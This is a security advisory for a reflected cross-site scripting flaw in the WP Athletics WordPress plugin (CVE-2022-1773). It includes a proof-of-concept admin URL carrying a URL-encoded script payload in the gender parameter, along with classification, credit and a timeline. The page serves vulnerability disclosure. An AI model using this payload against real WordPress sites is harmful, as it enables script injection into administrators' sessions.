WordPress Plugin Vulnerabilities

WP Athletics <= 1.1.7 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting back in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

http://example.com/wp-admin/admin.php?page=wp-athletics-print-rankings&print=true&period=all&type=all&age=all&event=1&gender=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

Affects Plugins

Plugin icon
wp-athletics
No known fix

References

CVE
CVE-2022-1773

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Wejdan Alomari
Submitter
Wejdan Alomari
Verified
Yes
WPVDB ID
c2cc3d8e-f3ac-46c6-871e-894cf3ba67f6

Timeline

Publicly Published
2022-05-17 (about 2 years ago)
Added
2022-05-17 (about 2 years ago)
Last Updated
2022-05-18 (about 2 years ago)

Other

Published
Title
Published
2023-05-12
Title
Booking Ultra Pro < 1.1.7 - Subscriber+ Settings Update
Published
2023-11-15
Title
Accordion < 2.7 - Authenticated (Editor+) Stored Cross-Site Scripting via accordion settings
Published
2024-05-06
Title
Featured Content Gallery <= 3.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting
Published
2014-08-01
Title
Spreadsheet - /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS
Published
2023-07-24
Title
Contact Form Builder by Bit Form < 2.2.0 - Admin+ Stored XSS